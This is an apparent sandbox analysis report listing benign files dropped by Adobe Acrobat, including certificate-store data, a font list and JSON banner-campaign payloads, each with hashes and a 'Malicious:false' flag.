                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):893
                              Entropy (8bit):7.366016576663508
                              Encrypted:false
                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                              Malicious:false
                              Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:modified
                              Size (bytes):328
                              Entropy (8bit):3.1356875516282012
                              Encrypted:false
                              SSDEEP:6:kKtU9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:BDnLNkPlE99SNxAhUe/3
                              MD5:4C7B14B4C8F19AD831EE1B9AA55CB78F
                              SHA1:8CDE92029DB86BDFC645EDB6FBE63172785B06C6
                              SHA-256:15F1C5C6B877E215BDC82E60FE7BEF0CE1C03FDD9E6150ABFF18935D30159D04
                              SHA-512:9E010A43D762BDC37B816258317038DD6AEC6D3BFDF6097BA200B35A4F3816F17A5A00144497DB40265C62FE6D9C9B91BB2FFAFB4102F7AFA6A76F1B41E8A1F2
                              Malicious:false
                              Preview:p...... ..........y.k...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):3.026467887142631
                              Encrypted:false
                              SSDEEP:3:kkFklBoN/ltfllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7l3:kKTxliBAIdQZV7I7kc3
                              MD5:F292800B3055289442E7DFF92727E98B
                              SHA1:D4431FAC27346D037DBEA3F33DCF6D283D0FC423
                              SHA-256:C23D6469FC7C6A518412AE1FF70ACF048C94877B03C41062F36DA2A4582BA48F
                              SHA-512:4FBDBDF7E0779FD4BA3B1C760A8EBCED3327D7D9B9EB00C7000C8C5641F0B733690D3B9A851E4D7DF4598DD62AE788BC9917A2714625A364256183512F2C407A
                              Malicious:false
                              Preview:p...... ....`......k...(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):185099
                              Entropy (8bit):5.182478651346149
                              Encrypted:false
                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):185099
                              Entropy (8bit):5.182478651346149
                              Encrypted:false
                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):295
                              Entropy (8bit):5.333694322087467
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJM3g98kUwPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGMbLUkee9
                              MD5:FC4E363338CB91D1320D8FBF15B5CDD3
                              SHA1:32F3E292F2A1EC4AA4CB153B3DC9E23B952A8F26
                              SHA-256:6BC616BF0969A4A7AC0A24CCC5F43FCDEDC1AFAAD5F7DF2CE3E06154085D3A5D
                              SHA-512:E8EF0591D79198554B7A6402F6F9E84FC19C2B159E34AD9E34BD283E83F0F9B8239F1902C80E2B1CE0FAA11E6F264AD7CEA647C23DE3A7E42F4FD2CED55744ED
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.285791360346204
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfBoTfXpnrPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGWTfXcUkee9
                              MD5:6C04E2785BB94585E31A51EE881A790B
                              SHA1:06BF36FC56FE3CC4D3E02C3DB7481A23742DA150
                              SHA-256:BA541243E3D2B860CFD718A2DF852E10E74B17B0BBC37187FFF55E9449772FC9
                              SHA-512:CB5ADE23E30BBC4F585B5AB7B166DC146780C9DC6442BACE9A4F6DEA38A933C9F2795815C256566F0929572E264FEADE85774564F78D6B72BCE5679BE6B18D83
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):294
                              Entropy (8bit):5.265059154260874
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfBD2G6UpnrPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGR22cUkee9
                              MD5:D2EE74B9094B1477479EBBA419318F18
                              SHA1:8103B29DE3278DBA32CC799C036AC9BA13AD07FF
                              SHA-256:EDD2B39D295538993A617AE200D45B2FE93408A0E593DD9A5B2E5846A4391651
                              SHA-512:24EDC461F68D8337842A62D95D0A6C2CBB3B505CAA647FCADA9C169533D5F9CE2BB35CFBB97D52C4F4C0DDFD867195B788190911DB288A530F09A5356B2A7F53
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):285
                              Entropy (8bit):5.313655334848674
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfPmwrPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGH56Ukee9
                              MD5:46A17D2123221872E208771858AD2307
                              SHA1:16CD256B68D165115863C470874471CBE95522D2
                              SHA-256:7A364B9927E99970DEC1E2528390BA7F67CC58EAB59D255E22D1F94CCC69D8E6
                              SHA-512:6A950A52994851DEC6351C2AE1A3025077CE8C2D4E014915E318737E0D07772C4ED69034F9A2EDF6002EC08F14FC66793404B27D06F3183852AE04ECC00D2E96
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1063
                              Entropy (8bit):5.6742002623887515
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRV6pLgEFqciGennl0RCmK8czOCY4w2kxY:YvEIXeV6hgLtaAh8cvYvc
                              MD5:A3AA0229DF9A88BD05D3B56DA4EB5D8C
                              SHA1:78B2F54E0EBAFD8027F78820E58ABEB263C98629
                              SHA-256:882A1004F5CE768A59805E1ED903E3D3F523AB261A1FAEF7BA99EEEE03BD134C
                              SHA-512:9F131C1F287F874C1C87F1341B5BE924A6057B107DBC4FEDA2AC73C28995DB1114C486A2BBF94706AB8468B4CE4FE2A04C920B8B039674DCB2526D2ED14E13A1
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1050
                              Entropy (8bit):5.665180687247833
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVcVLgEF0c7sbnl0RCmK8czOCYHflEpwiVkx:YvEIXeVcFg6sGAh8cvYHWpwR
                              MD5:BB84F1B6DB79EF8CA1E995BDC38DAD20
                              SHA1:25F50561533B33A6A745B9803CBE46E112C91990
                              SHA-256:536754B49CCC19FDF2DF609D4D45803E4C2D5E9B8F8AB72922013329906A2A16
                              SHA-512:F21F4DA51E9C0065CD546D922D34996937883BD58F5262E199EFD78E979E9DD50F2A96ADF5890A6BC3E1103367E6657439D0414F75C56774CF8F09045D4E843E
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):292
                              Entropy (8bit):5.279207126041042
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfQ1rPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGY16Ukee9
                              MD5:E8B4C4FB05AC4C530E6E0050B337BDB8
                              SHA1:834824FF44D022DF2D9EC519B6D8D78B81952A8A
                              SHA-256:B107FA1BA10CF655AB608D1E723DB7EDD90351997493BED6932DBF52F018F36C
                              SHA-512:C2F1D1C29A1F0FB77F8BE858604C4F4A6B2F7FF54E28BF140E22DCE5F513C899E542F56D683DF706EC7514E2BED254DDA1C4D42FF00056218058947096DC9ED7
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1038
                              Entropy (8bit):5.657228445056415
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVB2LgEF7cciAXs0nl0RCmK8czOCAPtciBkx:YvEIXeVBogc8hAh8cvAu
                              MD5:E1DEC5C0265502EA2923C27156912917
                              SHA1:9A5763E81CE91C5E13A24F1D9F095005E183B7D8
                              SHA-256:B32E4861A273E280B29E9388A08C4E3E24973496572EED8EB5EDE6F1FAA317FF
                              SHA-512:1786692E0650F3333585565C78FA3EDB8A0ED6888869196EF2576B95691305396D3F516808C5476BB860AFEBAE8538E3D62D38E736CF4CDBFC9DD2BEF554BB29
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1164
                              Entropy (8bit):5.703872595368498
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVBKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5kxY:YvEIXeVBEgqprtrS5OZjSlwTmAfSKN
                              MD5:B38FFD8AD1BF4B97E4216A9107941ADA
                              SHA1:873F1C14C55E399DAADC4696C58E76E07BA0B9C8
                              SHA-256:BB3963B53D72C14B32FDB019B6A3C926C2F3532A2CC56E95CBB870C37F6EC7A5
                              SHA-512:6236AE276A4EBB2F01BE704E0B07222BE75A8F66A4C730E9ED2C5C15B4628BE6141BA83C07AEF5A6D9E3F638B7841B1037E6BD17095C29D71FD6624637040BBA
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):289
                              Entropy (8bit):5.294268748204797
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfYdPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGg8Ukee9
                              MD5:1650E00D55AA01D04C789F1EA15EF76D
                              SHA1:A1C5E617E500D2E44FE7AA77A7B3DFD0C4BC00C2
                              SHA-256:E2EF71E03F3F57D7327640C36AE2A4B55CF1B09A64C9DB6794C671856B6DF537
                              SHA-512:917195A44ADD3CC6F7AB86528BC300034C060DD44FEB467C41A8DEC79B4637E1E13C271A5FF243A3DDB11CCDB4C4408F5E9B720E2A19C8D33F02697916A698AD
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):1395
                              Entropy (8bit):5.7758310058114715
                              Encrypted:false
                              SSDEEP:24:Yv6XBUrvvT5XInRVMrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJN4:YvEIXeVMHgDv3W2aYQfgB5OUupHrQ9FA
                              MD5:F60D558881D03D952FFD4B01769827F2
                              SHA1:B2AC854BAC734BBB57EB572EAE7BF54F6FE1C023
                              SHA-256:0347251805EB9BF8BD591999602FBE865204C1AF7FF9D1CE841D0747BC80EF4B
                              SHA-512:8AA6AA06EA536B82B9737BFFD424BA9DF783DC723E2AB494BC92B93B1E62DE867146F6318BBCD6A76FFCC69CFF605DDDE6A1CF8E19EC095C934619D28A7C14C6
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):291
                              Entropy (8bit):5.277855235925365
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJfbPtdPeUkwRe9:YvXKXBUr46vT5LjIPPRVVGDV8Ukee9
                              MD5:75715D4DE0A148DACE4DE71CAA820EFB
                              SHA1:4CB031A9157ED49F5035D08DE15916FC127965C9
                              SHA-256:1B943E99792E774C46624FDC1FB6130D016955DF05B771D52806912B6123AFAE
                              SHA-512:B14A7AB5CDDCC28AB8CE4949832676780B7EC374825BC2E65ECFC94AA4CFA339BCA6E3F997490C44F7B5C374EE5B31ABEBCDF61FD09395B875449091EE653FEC
                              Malicious:false
                              Preview:{"analyticsData":{"responseGUID":"6171671f-c0ba-4e93-8026-ee0b00274022","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1725037670094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):287
                              Entropy (8bit):5.269535834356661
                              Encrypted:false
                              SSDEEP:6:YEQXJ2HXBUr4fi9XWmSg1c2LjcWkHvR0YDRYieoAvJf21rPeUkwRe9:YvXKXBUr46vT5LjIPPRVVG+16Ukee9
                              MD5:F590D386F6C6DED8D382963C0EED20ED
                              SHA1:E4ACC892E215311BA8D690BF3F5D566AFFCA47D6
                              SHA-256:38EF5CBA89EDB644D18FA89A3730661B264DE2C27B24CC743D3D519D5F417DB3
                              SHA-512:9E8FD2B86C89901B085A3BAE063E2D6D0C3D3F896B7EA604475F04841A7DEC76EBD7CD98F3EFF4AFAC8372B235471BC1A3B9DF5CD8A005634F21DBDDB0DFD234
                              Malicious:false
